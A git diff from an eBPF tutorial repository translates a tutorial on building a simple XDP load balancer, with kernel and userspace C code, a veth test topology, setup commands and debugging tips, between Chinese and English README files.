-某些系统可能会因为类似于此[博客文章](https://fedepaol.github.io/blog/2023/09/11/xdp-ate-my-packets-and-how-i-debugged-it/)中描述的问题而导致数据包丢失或转发失败。您可以使用 `bpftrace` 跟踪 XDP 错误进行调试: +Some systems may experience packet loss or failure to forward packets due to issues similar to those described in this [blog post](https://fedepaol.github.io/blog/2023/09/11/xdp-ate-my-packets-and-how-i-debugged-it/). You can debug these issues using `bpftrace` to trace XDP errors: ```sh sudo bpftrace -e 'tracepoint:xdp:xdp_bulk_tx{@redir_errno[-args->err] = count();}' ``` -如果输出如下所示: +If you see an output like this: ```sh @redir_errno[6]: 3 ``` -这表明与 XDP 数据包转发相关的错误。错误代码 `6` 通常指向可以进一步调查的特定转发问题。 +It indicates errors related to XDP packet forwarding. The error code `6` typically points to a particular forwarding issue that can be further investigated. -### 结论 +### Conclusion -本教程展示了如何使用 eBPF 设置一个简单的 XDP 负载均衡器,以实现高效的流量分发。对于那些想了解更多关于 eBPF 知识的用户,包括更高级的示例和教程,请访问我们的 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。 +This tutorial demonstrates how to set up a simple XDP load balancer using eBPF, providing efficient traffic distribution across backend servers. For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). -### 参考文献 +### References -- [XDP 编程实践教程](https://github.com/xdp-project/xdp-tutorial) \ No newline at end of file +Here’s a simple list of XDP references: + +1. [XDP Programming Hands-On Tutorial](https://github.com/xdp-project/xdp-tutorial) +2. [XDP Tutorial in bpf-developer-tutorial](https://eunomia.dev/tutorials/21-xdp/) diff --git a/src/42-xdp-loadbalancer/README.zh.md b/src/42-xdp-loadbalancer/README.zh.md new file mode 100644 index 0000000..06fc527 --- /dev/null +++ b/src/42-xdp-loadbalancer/README.zh.md @@ -0,0 +1,527 @@ +# eBPF 开发者教程: 简单的 XDP 负载均衡器 + +在本教程中,我们将指导您如何使用eBPF(扩展的Berkeley Packet Filter)实现一个简单的XDP(eXpress Data Path)负载均衡器。只需使用C语言和libbpf库,无需外部依赖,这是一个适合开发者的实践指南,帮助您充分利用Linux内核的强大功能来构建高效的网络应用程序。 + +## 为什么选择XDP? + +`XDP`(eXpress Data Path)是Linux中的一个高速、内核级网络框架,它允许在网络堆栈的最早阶段,即在网络接口卡(NIC)上处理数据包。这使得XDP可以进行超低延迟和高吞吐量的数据包处理,非常适合用于负载均衡、DDoS保护和流量过滤等任务。 + +XDP的关键特性: + +1. **快速数据包处理**:XDP直接在网络接口卡(NIC)级别处理数据包,减少了延迟,并通过避免通常的网络堆栈开销来提高性能。 +2. **高效**:由于在数据包进入内核之前处理它们,XDP最大限度地减少了CPU使用率,能够在高流量负载下保持系统的快速响应。 +3. **可定制的eBPF**:XDP程序使用eBPF编写,允许您为特定的用例创建自定义的数据包处理逻辑,例如丢弃、重定向或转发数据包。 +4. **低CPU开销**:支持零拷贝数据包转发,XDP占用更少的系统资源,非常适合在最少CPU负载的情况下处理高流量。 +5. **简单操作**:XDP程序返回预定义的操作,例如丢弃、通过或重定向数据包,提供对流量处理的控制。 + +### 使用XDP的项目 + +- `Cilium` 是一个为云原生环境(如Kubernetes)设计的开源网络工具。它使用XDP高效处理数据包过滤和负载均衡,提升了高流量网络中的性能。 +- `Katran` 由Facebook开发,是一个负载均衡器,它使用XDP处理数百万的连接,且CPU使用率低。它高效地将流量分发到服务器,在Facebook内部被用于大规模的网络环境。 +- `Cloudflare` 使用XDP来防御DDoS攻击。通过在NIC级别过滤恶意流量,Cloudflare可以在攻击数据包进入内核之前将其丢弃,最大限度地减少对网络的影响。 + +### 为什么选择XDP而不是其他方法? + +与传统工具如`iptables`或`tc`相比,XDP具有以下优势: + +- **速度**:它直接在NIC驱动程序中操作,数据包处理速度远快于传统方法。 +- **灵活性**:通过eBPF,您可以编写自定义的数据包处理逻辑,以满足特定需求。 +- **效率**:XDP使用更少的资源,非常适合需要处理高流量而不使系统过载的环境。 + +## 项目:构建一个简单的负载均衡器 + +在本项目中,我们将专注于使用XDP构建一个负载均衡器。负载均衡器通过将传入的网络流量高效地分发到多个后端服务器,防止单个服务器过载。结合XDP和eBPF,我们可以构建一个运行在Linux网络堆栈边缘的负载均衡器,确保即使在高流量情况下也能保持高性能。 + +我们将实现的负载均衡器将具备以下功能: + +- 监听传入的网络数据包。 +- 根据数据包的源IP和端口计算哈希值,从而将流量分发到多个后端服务器。 +- 根据计算出的哈希值将数据包转发到相应的后端服务器。 + +我们将保持设计简单但强大,向您展示如何利用eBPF的能力来创建一个轻量级的负载均衡解决方案。 + +## kernel eBPF code + +```c +// xdp_lb.bpf.c +#include +#include +#include +#include +#include +#include +#include +#include "xx_hash.h" + +struct backend_config { + __u32 ip; + unsigned char mac[ETH_ALEN]; +}; + +// Backend IP and MAC address map +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, 2); // Two backends + __type(key, __u32); + __type(value, struct backend_config); +} backends SEC(".maps"); + +int client_ip = bpf_htonl(0xa000001); +unsigned char client_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x1}; +int load_balancer_ip = bpf_htonl(0xa00000a); +unsigned char load_balancer_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x10}; + +static __always_inline __u16 +csum_fold_helper(__u64 csum) +{ + int i; + for (i = 0; i < 4; i++) + { + if (csum >> 16) + csum = (csum & 0xffff) + (csum >> 16); + } + return ~csum; +} + +static __always_inline __u16 +iph_csum(struct iphdr *iph) +{ + iph->check = 0; + unsigned long long csum = bpf_csum_diff(0, 0, (unsigned int *)iph, sizeof(struct iphdr), 0); + return csum_fold_helper(csum); +} + +SEC("xdp") +int xdp_load_balancer(struct xdp_md *ctx) { + void *data_end = (void *)(long)ctx->data_end; + void *data = (void *)(long)ctx->data; + + bpf_printk("xdp_load_balancer received packet"); + + // Ethernet header + struct ethhdr *eth = data; + if ((void *)(eth + 1) > data_end) + return XDP_PASS; + + // Check if the packet is IP (IPv4) + if (eth->h_proto != __constant_htons(ETH_P_IP)) + return XDP_PASS; + + // IP header + struct iphdr *iph = (struct iphdr *)(eth + 1); + if ((void *)(iph + 1) > data_end) + return XDP_PASS; + + // Check if the protocol is TCP or UDP + if (iph->protocol != IPPROTO_TCP) + return XDP_PASS; + + bpf_printk("Received Source IP: 0x%x", bpf_ntohl(iph->saddr)); + bpf_printk("Received Destination IP: 0x%x", bpf_ntohl(iph->daddr)); + bpf_printk("Received Source MAC: %x:%x:%x:%x:%x:%x", eth->h_source[0], eth->h_source[1], eth->h_source[2], eth->h_source[3], eth->h_source[4], eth->h_source[5]); + bpf_printk("Received Destination MAC: %x:%x:%x:%x:%x:%x", eth->h_dest[0], eth->h_dest[1], eth->h_dest[2], eth->h_dest[3], eth->h_dest[4], eth->h_dest[5]); + + if (iph->saddr == client_ip) + { + bpf_printk("Packet from client"); + + __u32 key = xxhash32((const char*)iph, sizeof(struct iphdr), 0) % 2; + + struct backend_config *backend = bpf_map_lookup_elem(&backends, &key); + if (!backend) + return XDP_PASS; + + iph->daddr = backend->ip; + __builtin_memcpy(eth->h_dest, backend->mac, ETH_ALEN); + } + else + { + bpf_printk("Packet from backend"); + iph->daddr = client_ip; + __builtin_memcpy(eth->h_dest, client_mac, ETH_ALEN); + } + + // Update IP source address to the load balancer's IP + iph->saddr = load_balancer_ip; + // Update Ethernet source MAC address to the current lb's MAC + __builtin_memcpy(eth->h_source, load_balancer_mac, ETH_ALEN); + + // Recalculate IP checksum + iph->check = iph_csum(iph); + + bpf_printk("Redirecting packet to new IP 0x%x from IP 0x%x", + bpf_ntohl(iph->daddr), + bpf_ntohl(iph->saddr) + ); + bpf_printk("New Dest MAC: %x:%x:%x:%x:%x:%x", eth->h_dest[0], eth->h_dest[1], eth->h_dest[2], eth->h_dest[3], eth->h_dest[4], eth->h_dest[5]); + bpf_printk("New Source MAC: %x:%x:%x:%x:%x:%x\n", eth->h_source[0], eth->h_source[1], eth->h_source[2], eth->h_source[3], eth->h_source[4], eth->h_source[5]); + // Return XDP_TX to transmit the modified packet back to the network + return XDP_TX; +} + +char _license[] SEC("license") = "GPL"; +``` + +## 内核代码关键部分解读 + +### 1. **头文件和数据结构** + +代码首先包含了一些必要的头文件,例如 ``、``、`` 等。这些头文件提供了处理以太网帧、IP 数据包以及 BPF 辅助函数的定义。 + +`backend_config` 结构体被定义用于存储后端服务器的 IP 和 MAC 地址。这将在负载均衡逻辑中用于根据流量分配规则路由数据包。 + +```c +struct backend_config { + __u32 ip; + unsigned char mac[ETH_ALEN]; +}; +``` + +### 2. **后端和负载均衡器配置** + +代码定义了一个名为 `backends` 的 eBPF map,用于存储两个后端的 IP 和 MAC 地址。`BPF_MAP_TYPE_ARRAY` 类型用于存储后端的配置信息,`max_entries` 设置为 2,表示该负载均衡器将把流量分配给两个后端服务器。 + +```c +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, 2); + __type(key, __u32); + __type(value, struct backend_config); +} backends SEC(".maps"); +``` + +同时也预定义了客户端和负载均衡器的 IP 地址和 MAC 地址: + +```c +int client_ip = bpf_htonl(0xa000001); +unsigned char client_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x1}; +int load_balancer_ip = bpf_htonl(0xa00000a); +unsigned char load_balancer_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x10}; +``` + +### 3. **校验和函数** + +`iph_csum()` 函数在修改数据包内容后重新计算 IP 头的校验和。在对头部进行任何修改时,确保 IP 数据包的完整性是至关重要的。 + +```c +static __always_inline __u16 iph_csum(struct iphdr *iph) { + iph->check = 0; + unsigned long long csum = bpf_csum_diff(0, 0, (unsigned int *)iph, sizeof(struct iphdr), 0); + return csum_fold_helper(csum); +} +``` + +### 4. **XDP 程序逻辑** + +XDP 负载均衡器的核心逻辑在 `xdp_load_balancer` 函数中实现,该函数附加到 XDP 钩子上。它处理传入的数据包,并根据不同情况将数据包转发到后端或回传给客户端。 + +- **初始检查**: + 函数首先验证数据包是否是以太网帧,接着检查它是否是 IP 数据包(IPv4)并且使用了 TCP 协议。 + + ```c + if (eth->h_proto != __constant_htons(ETH_P_IP)) + return XDP_PASS; + if (iph->protocol != IPPROTO_TCP) + return XDP_PASS; + ``` + +- **客户端数据包处理**: + 如果源 IP 与客户端 IP 匹配,代码使用 `xxhash32` 对 IP 头进行哈希处理,以确定相应的后端(基于 key 对 2 取模)。 + + ```c + if (iph->saddr == client_ip) { + __u32 key = xxhash32((const char*)iph, sizeof(struct iphdr), 0) % 2; + struct backend_config *backend = bpf_map_lookup_elem(&backends, &key); + ``` + + 之后将目标 IP 和 MAC 替换为选定的后端的值,并将数据包转发到后端。 + +- **后端数据包处理**: + 如果数据包来自后端服务器,代码将目标设置为客户端的 IP 和 MAC 地址,确保后端的响应数据包被正确地转发回客户端。 + + ```c + iph->daddr = client_ip; + __builtin_memcpy(eth->h_dest, client_mac, ETH_ALEN); + ``` + +- **重写 IP 和 MAC 地址**: + 对于所有的出站数据包,源 IP 和 MAC 地址会被更新为负载均衡器的值,以确保在客户端与后端之间通信时,负载均衡器作为源进行标识。 + + ```c + iph->saddr = load_balancer_ip; + __builtin_memcpy(eth->h_source, load_balancer_mac, ETH_ALEN); + ``` + +- **重新计算校验和**: + 修改 IP 头之后,使用之前定义的 `iph_csum()` 函数重新计算校验和。 + + ```c + iph->check = iph_csum(iph); + ``` + +- **最终动作**: + 使用 `XDP_TX` 动作发送数据包,这指示网卡将修改后的数据包传输出去。 + + ```c + return XDP_TX; + ``` + +### 5. **结论** + +在这部分博客中,可以解释负载均衡器是如何通过检查源 IP、进行哈希计算来分配流量,并通过修改目标 IP 和 MAC 来确保数据包的转发。`XDP_TX` 动作是实现 eBPF 在 XDP 层中高速数据包处理的关键。 + +这一解释可以帮助读者理解数据包的流转过程,以及代码中每个部分在实现多个后端之间负载均衡的过程中所起的作用。 + + +## Userspace code + +```c +// xdp_lb.c +#include +#include +#include +#include +#include +#include +#include +#include +#include "xdp_lb.skel.h" // The generated skeleton + +struct backend_config { + __u32 ip; + unsigned char mac[6]; +}; + +static int parse_mac(const char *str, unsigned char *mac) { + if (sscanf(str, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx", + &mac[0], &mac[1], &mac[2], &mac[3], &mac[4], &mac[5]) != 6) { + fprintf(stderr, "Invalid MAC address format\n"); + return -1; + } + return 0; +} + +int main(int argc, char **argv) { + if (argc != 6) { + fprintf(stderr, "Usage: %s \n", argv[0]); + return 1; + } + + const char *ifname = argv[1]; + struct backend_config backend[2]; + + // Parse backend 1 + if (inet_pton(AF_INET, argv[2], &backend[0].ip) != 1) { + fprintf(stderr, "Invalid backend 1 IP address\n"); + return 1; + } + if (parse_mac(argv[3], backend[0].mac) < 0) { + return 1; + } + + // Parse backend 2 + if (inet_pton(AF_INET, argv[4], &backend[1].ip) != 1) { + fprintf(stderr, "Invalid backend 2 IP address\n"); + return 1; + } + if (parse_mac(argv[5], backend[1].mac) < 0) { + return 1; + } + + // Load and attach the BPF program + struct xdp_lb_bpf *skel = xdp_lb_bpf__open_and_load(); + if (!skel) { + fprintf(stderr, "Failed to open and load BPF skeleton\n"); + return 1; + } + + int ifindex = if_nametoindex(ifname); + if (ifindex < 0) { + perror("if_nametoindex"); + xdp_lb_bpf__destroy(skel); + return 1; + } + + if (bpf_program__attach_xdp(skel->progs.xdp_load_balancer, ifindex) < 0) { + fprintf(stderr, "Failed to attach XDP program\n"); + xdp_lb_bpf__destroy(skel); + return 1; + } + + // Update backend configurations + for (int i = 0; i < 2; i++) { + if (bpf_map_update_elem(bpf_map__fd(skel->maps.backends), &i, &backend[i], 0) < 0) { + perror("bpf_map_update_elem"); + xdp_lb_bpf__destroy(skel); + return 1; + } + } + + printf("XDP load balancer configured with backends:\n"); + printf("Backend 1 - IP: %s, MAC: %s\n", argv[2], argv[3]); + printf("Backend 2 - IP: %s, MAC: %s\n", argv[4], argv[5]); + + printf("Press Ctrl+C to exit...\n"); + while (1) { + sleep(1); // Keep the program running + } + + // Cleanup and detach + bpf_xdp_detach(ifindex, 0, NULL); + xdp_lb_bpf__detach(skel); + xdp_lb_bpf__destroy(skel); + return 0; +} +``` + +### 用户空间代码概述 + +提供的用户空间代码负责设置和配置在内核中运行的 XDP 负载均衡器程序。它接受命令行参数,加载 eBPF 程序,将其附加到网络接口,并更新后端服务器的配置信息。 + +### 1. **解析命令行参数和设置后端服务器** + +程序期望五个命令行参数:网络接口的名称 (`ifname`)、两个后端服务器的 IP 地址和 MAC 地址。它通过 `inet_pton()` 函数解析 IP 地址,并使用 `parse_mac()` 函数解析 MAC 地址,确保提供的 MAC 地址格式正确。解析后的后端信息存储在 `backend_config` 结构体中。 + +### 2. **加载并附加 BPF 程序** + +BPF skeleton(通过 `xdp_lb.skel.h` 生成)用于打开并将 XDP 程序加载到内核中。程序通过 `if_nametoindex()` 将网络接口名称转换为索引,然后使用 `bpf_program__attach_xdp()` 将加载的 BPF 程序附加到此接口上。 + +### 3. **配置后端服务器信息** + +后端的 IP 和 MAC 地址被写入 `backends` BPF map 中,使用 `bpf_map_update_elem()` 函数。此步骤确保 BPF 程序能够访问后端配置,从而基于内核代码中的逻辑将数据包路由到正确的后端服务器。 + +### 4. **程序循环与清理** + +程序进入无限循环(`while (1) { sleep(1); }`),使 XDP 程序保持运行。当用户通过按下 Ctrl+C 退出时,BPF 程序从网络接口上卸载,并通过调用 `xdp_lb_bpf__destroy()` 清理资源。 + +总的来说,这段用户空间代码负责配置和管理 XDP 负载均衡器的生命周期,使得可以动态更新后端配置,并确保负载均衡器正确附加到网络接口上。 + +### 测试环境拓扑 + +拓扑结构表示一个测试环境,其中本地机器通过负载均衡器与两个后端节点(h2 和 h3)通信。通过虚拟以太网对(veth0 到 veth6),本地机器与负载均衡器相连,在受控环境中模拟网络连接。每个虚拟接口都有自己的 IP 和 MAC 地址,代表不同的实体。 + +```txt + +---------------------------+ + | 本地机器 | + | IP: 10.0.0.1 (veth0) | + | MAC: DE:AD:BE:EF:00:01 | + +------------+---------------+ + | + | (veth1) + | + +--------+---------------+ + | 负载均衡器 | + | IP: 10.0.0.10 (veth6) | + | MAC: DE:AD:BE:EF:00:10| + +--------+---------------+ + | + +---------+----------------------------+ + | | +(veth2) (veth4) + | | ++--+---------------+ +--------+---------+ +| h2 | | h3 | +| IP: | | IP: | +|10.0.0.2 (veth3) | |10.0.0.3 (veth5) | +| MAC: | | MAC: | +|DE:AD:BE:EF:00:02 | |DE:AD:BE:EF:00:03 | ++------------------+ +------------------+ +``` + +这个设置可以通过脚本(`setup.sh`)轻松初始化,并通过另一个脚本(`teardown.sh`)删除。 + +> 如果您对本教程感兴趣,请帮助我们创建一个容器化的版本,简化设置和拓扑结构!目前的设置和删除过程基于网络命名空间,容器化的版本会更加友好。 + +初始化: + +```sh +sudo ./setup.sh +``` + +删除: + +```sh +sudo ./teardown.sh +``` + +### 运行负载均衡器 + +要运行 XDP 负载均衡器,执行以下命令,指定接口和后端服务器的 IP 和 MAC 地址: + +```console +sudo ip netns exec lb ./xdp_lb veth6 10.0.0.2 de:ad:be:ef:00:02 10.0.0.3 de:ad:be:ef:00:03 +``` + +这将配置负载均衡器并输出后端服务器的详细信息: + +```console +XDP load balancer configured with backends: +Backend 1 - IP: 10.0.0.2, MAC: de:ad:be:ef:00:02 +Backend 2 - IP: 10.0.0.3, MAC: de:ad:be:ef:00:03 +Press Ctrl+C to exit... +``` + +### 测试设置 + +您可以通过在两个后端命名空间(`h2` 和 `h3`)启动 HTTP 服务器,并从本地机器向负载均衡器发送请求来测试设置: + +在 `h2` 和 `h3` 上启动服务器: + +```sh +sudo ip netns exec h2 python3 -m http.server +sudo ip netns exec h3 python3 -m http.server +``` + +然后,向负载均衡器 IP 发送请求: + +```sh +curl 10.0.0.10:8000 +``` + +负载均衡器将根据哈希函数将流量分配到后端服务器(`h2` 和 `h3`)。 + +### 使用 `bpf_printk` 进行监控 + +您可以通过查看 `bpf_printk` 日志来监控负载均衡器的活动。BPF 程序在处理每个数据包时会打印诊断消息。您可以使用以下命令查看这些日志: + +```console +sudo cat /sys/kernel/debug/tracing/trace_pipe +``` + +日志示例: + +```console +-0 [004] ..s2. 24174.812722: bpf_trace_printk: xdp_load_balancer received packet +-0 [004] .Ns2. 24174.812729: bpf_trace_printk: Received Source IP: 0xa000001 +-0 [004] .Ns2. 24174.812729: Received Destination IP: 0xa00000a +-0 [004] .Ns2. 24174.812731: Received Source MAC: de:ad:be:ef:0:1 +-0 [004] .Ns2. 24174.812732: Received Destination MAC: de:ad:be:ef:0:10 +-0 [004] .Ns2. 24174.812732: Packet from client +-0 [004] .Ns2. 24174.812734: bpf_trace_printk: Redirecting packet to new IP 0xa000002 from IP 0xa00000a +-0 [004] .Ns2. 24174.812735: New Dest MAC: de:ad:be:ef:0:2 +-0 [004] .Ns2. 24174.812735: New Source MAC: de:ad:be:ef:0:10 +``` + +### 调试问题 + +某些系统可能会因为类似于此[博客文章](https://fedepaol.github.io/blog/2023/09/11/xdp-ate-my-packets-and-how-i-debugged-it/)中描述的问题而导致数据包丢失或转发失败。您可以使用 `bpftrace` 跟踪 XDP 错误进行调试: + +```sh +sudo bpftrace -e 'tracepoint:xdp:xdp_bulk_tx{@redir_errno[-args->err] = count();}' +``` + +如果输出如下所示: + +```sh +@redir_errno[6]: 3 +``` + +这表明与 XDP 数据包转发相关的错误。错误代码 `6` 通常指向可以进一步调查的特定转发问题。 + +### 结论 + +本教程展示了如何使用 eBPF 设置一个简单的 XDP 负载均衡器,以实现高效的流量分发。对于那些想了解更多关于 eBPF 知识的用户,包括更高级的示例和教程,请访问我们的 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。 + +### 参考文献 + +- [XDP 编程实践教程](https://github.com/xdp-project/xdp-tutorial) \ No newline at end of file diff --git a/src/42-xdp-loadbalancer/README_en.md b/src/42-xdp-loadbalancer/README_en.md deleted file mode 100644 index c792e8f..0000000 --- a/src/42-xdp-loadbalancer/README_en.md +++ /dev/null @@ -1,528 +0,0 @@ - -# eBPF Developer Tutorial: XDP Load Balancer - -In this tutorial, we will guide you through the process of implementing a simple XDP (eXpress Data Path) load balancer using eBPF (Extended Berkeley Packet Filter). With just C, libbpf, and no external dependencies, this hands-on guide is perfect for developers interested in harnessing the full power of the Linux kernel to build highly efficient network applications. - -## Why XDP? - -`XDP` (eXpress Data Path) is a fast, in-kernel networking framework in Linux that allows packet processing at the earliest point in the network stack, right in the network interface card (NIC). This enables ultra-low-latency and high-throughput packet handling, making XDP ideal for tasks like load balancing, DDoS protection, and traffic filtering. - -Key Features of XDP - -1. **Fast Packet Processing**: XDP handles packets directly at the NIC level, reducing latency and improving performance by avoiding the usual networking stack overhead. -2. **Efficient**: Because it processes packets before they reach the kernel, XDP minimizes CPU usage and handles high traffic loads without slowing down the system. -3. **Customizable with eBPF**: XDP programs are written using eBPF, allowing you to create custom packet-handling logic for specific use cases like dropping, redirecting, or forwarding packets. -4. **Low CPU Overhead**: With support for zero-copy packet forwarding, XDP uses fewer system resources, making it perfect for handling high traffic with minimal CPU load. -5. **Simple Actions**: XDP programs return predefined actions like dropping, passing, or redirecting packets, providing control over how traffic is handled. - -Projects That Use XDP - -- `Cilium` is an open-source networking tool for cloud-native environments like Kubernetes. It uses XDP to efficiently handle packet filtering and load balancing, improving performance in high-traffic networks. -- `Katran`, developed by Facebook, is a load balancer that uses XDP to handle millions of connections with low CPU usage. It distributes traffic efficiently across servers and is used internally at Facebook for large-scale networking. -- `Cloudflare` uses XDP to protect against DDoS attacks. By filtering out malicious traffic at the NIC level, Cloudflare can drop attack packets before they even reach the kernel, minimizing the impact on their network. - -### Why Choose XDP Over Other Methods? - -Compared to traditional tools like `iptables` or `tc`, XDP offers: - -- **Speed**: It operates directly in the NIC driver, processing packets much faster than traditional methods. -- **Flexibility**: With eBPF, you can write custom packet-handling logic to meet specific needs. -- **Efficiency**: XDP uses fewer resources, making it suitable for environments that need to handle high traffic without overloading the system. - -## The Project: Building a Simple Load Balancer - -In this project, we will be focusing on building a load balancer using XDP. A load balancer efficiently distributes incoming network traffic across multiple backend servers to prevent any single server from becoming overwhelmed. With the combination of XDP and eBPF, we can build a load balancer that operates at the edge of the Linux networking stack, ensuring high performance even under heavy traffic conditions. - -The load balancer we’ll be implementing will: - -- Listen for incoming network packets. -- Calculate a hash based on the packet's source IP and port, allowing us to distribute the traffic across multiple backend servers. -- Forward the packet to the appropriate backend server based on the calculated hash. - -We'll keep the design simple but powerful, showing you how to leverage eBPF’s capabilities to create a lightweight load balancing solution. - -## kernel eBPF code - -```c -// xdp_lb.bpf.c -#include -#include -#include -#include -#include -#include -#include -#include "xx_hash.h" - -struct backend_config { - __u32 ip; - unsigned char mac[ETH_ALEN]; -}; - -// Backend IP and MAC address map -struct { - __uint(type, BPF_MAP_TYPE_ARRAY); - __uint(max_entries, 2); // Two backends - __type(key, __u32); - __type(value, struct backend_config); -} backends SEC(".maps"); - -int client_ip = bpf_htonl(0xa000001); -unsigned char client_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x1}; -int load_balancer_ip = bpf_htonl(0xa00000a); -unsigned char load_balancer_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x10}; - -static __always_inline __u16 -csum_fold_helper(__u64 csum) -{ - int i; - for (i = 0; i < 4; i++) - { - if (csum >> 16) - csum = (csum & 0xffff) + (csum >> 16); - } - return ~csum; -} - -static __always_inline __u16 -iph_csum(struct iphdr *iph) -{ - iph->check = 0; - unsigned long long csum = bpf_csum_diff(0, 0, (unsigned int *)iph, sizeof(struct iphdr), 0); - return csum_fold_helper(csum); -} - -SEC("xdp") -int xdp_load_balancer(struct xdp_md *ctx) { - void *data_end = (void *)(long)ctx->data_end; - void *data = (void *)(long)ctx->data; - - bpf_printk("xdp_load_balancer received packet"); - - // Ethernet header - struct ethhdr *eth = data; - if ((void *)(eth + 1) > data_end) - return XDP_PASS; - - // Check if the packet is IP (IPv4) - if (eth->h_proto != __constant_htons(ETH_P_IP)) - return XDP_PASS; - - // IP header - struct iphdr *iph = (struct iphdr *)(eth + 1); - if ((void *)(iph + 1) > data_end) - return XDP_PASS; - - // Check if the protocol is TCP or UDP - if (iph->protocol != IPPROTO_TCP) - return XDP_PASS; - - bpf_printk("Received Source IP: 0x%x", bpf_ntohl(iph->saddr)); - bpf_printk("Received Destination IP: 0x%x", bpf_ntohl(iph->daddr)); - bpf_printk("Received Source MAC: %x:%x:%x:%x:%x:%x", eth->h_source[0], eth->h_source[1], eth->h_source[2], eth->h_source[3], eth->h_source[4], eth->h_source[5]); - bpf_printk("Received Destination MAC: %x:%x:%x:%x:%x:%x", eth->h_dest[0], eth->h_dest[1], eth->h_dest[2], eth->h_dest[3], eth->h_dest[4], eth->h_dest[5]); - - if (iph->saddr == client_ip) - { - bpf_printk("Packet from client"); - - __u32 key = xxhash32((const char*)iph, sizeof(struct iphdr), 0) % 2; - - struct backend_config *backend = bpf_map_lookup_elem(&backends, &key); - if (!backend) - return XDP_PASS; - - iph->daddr = backend->ip; - __builtin_memcpy(eth->h_dest, backend->mac, ETH_ALEN); - } - else - { - bpf_printk("Packet from backend"); - iph->daddr = client_ip; - __builtin_memcpy(eth->h_dest, client_mac, ETH_ALEN); - } - - // Update IP source address to the load balancer's IP - iph->saddr = load_balancer_ip; - // Update Ethernet source MAC address to the current lb's MAC - __builtin_memcpy(eth->h_source, load_balancer_mac, ETH_ALEN); - - // Recalculate IP checksum - iph->check = iph_csum(iph); - - bpf_printk("Redirecting packet to new IP 0x%x from IP 0x%x", - bpf_ntohl(iph->daddr), - bpf_ntohl(iph->saddr) - ); - bpf_printk("New Dest MAC: %x:%x:%x:%x:%x:%x", eth->h_dest[0], eth->h_dest[1], eth->h_dest[2], eth->h_dest[3], eth->h_dest[4], eth->h_dest[5]); - bpf_printk("New Source MAC: %x:%x:%x:%x:%x:%x\n", eth->h_source[0], eth->h_source[1], eth->h_source[2], eth->h_source[3], eth->h_source[4], eth->h_source[5]); - // Return XDP_TX to transmit the modified packet back to the network - return XDP_TX; -} - -char _license[] SEC("license") = "GPL"; -``` - -Here’s a breakdown of the key sections of the kernel code for your blog: - -### 1. **Header Files and Data Structures** - -The code begins with necessary header files like ``, ``, ``, and more. These headers provide definitions for handling Ethernet frames, IP packets, and BPF helper functions. - -The `backend_config` struct is defined to hold the IP and MAC address of backend servers. This will later be used for routing packets based on load balancing logic. - -```c -struct backend_config { - __u32 ip; - unsigned char mac[ETH_ALEN]; -}; -``` - -### 2. **Backend and Load Balancer Configuration** - -The code defines an eBPF map named `backends` that stores IP and MAC addresses for two backends. The `BPF_MAP_TYPE_ARRAY` type is used to store backend configuration, with `max_entries` set to 2, indicating the load balancer will route to two backend servers. - -```c -struct { - __uint(type, BPF_MAP_TYPE_ARRAY); - __uint(max_entries, 2); - __type(key, __u32); - __type(value, struct backend_config); -} backends SEC(".maps"); -``` - -There are also predefined IP addresses and MAC addresses for the client and load balancer: - -```c -int client_ip = bpf_htonl(0xa000001); -unsigned char client_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x1}; -int load_balancer_ip = bpf_htonl(0xa00000a); -unsigned char load_balancer_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x10}; -``` - -### 3. **Checksum Functions** - -The function `iph_csum()` recalculates the IP header checksum after modifying the packet's contents. It's essential to keep the integrity of IP packets when any modification is done to the headers. - -```c -static __always_inline __u16 iph_csum(struct iphdr *iph) { - iph->check = 0; - unsigned long long csum = bpf_csum_diff(0, 0, (unsigned int *)iph, sizeof(struct iphdr), 0); - return csum_fold_helper(csum); -} -``` - -### 4. **XDP Program Logic** - -The core of the XDP load balancer logic is implemented in the `xdp_load_balancer` function, which is attached to the XDP hook. It processes incoming packets and directs them either to a backend or back to the client. - -- **Initial Checks**: - The function begins by verifying that the packet is an Ethernet frame, then checks if it's an IP packet (IPv4) and if it's using the TCP protocol. - - ```c - if (eth->h_proto != __constant_htons(ETH_P_IP)) - return XDP_PASS; - if (iph->protocol != IPPROTO_TCP) - return XDP_PASS; - ``` - -- **Client Packet Handling**: - If the source IP matches the client IP, the code hashes the IP header using `xxhash32` to determine the appropriate backend (based on the key modulo 2). - - ```c - if (iph->saddr == client_ip) { - __u32 key = xxhash32((const char*)iph, sizeof(struct iphdr), 0) % 2; - struct backend_config *backend = bpf_map_lookup_elem(&backends, &key); - ``` - - The destination IP and MAC are replaced with those of the selected backend, and the packet is forwarded to the backend. - -- **Backend Packet Handling**: - If the packet is from a backend server, the destination is set to the client’s IP and MAC address, ensuring that the backend’s response is directed back to the client. - - ```c - iph->daddr = client_ip; - __builtin_memcpy(eth->h_dest, client_mac, ETH_ALEN); - ``` - -- **Rewriting IP and MAC Addresses**: - The source IP and MAC are updated to the load balancer’s values for all outgoing packets, ensuring that the load balancer appears as the source for both client-to-backend and backend-to-client communication. - - ```c - iph->saddr = load_balancer_ip; - __builtin_memcpy(eth->h_source, load_balancer_mac, ETH_ALEN); - ``` - -- **Recalculate Checksum**: - After modifying the IP header, the checksum is recalculated using the previously 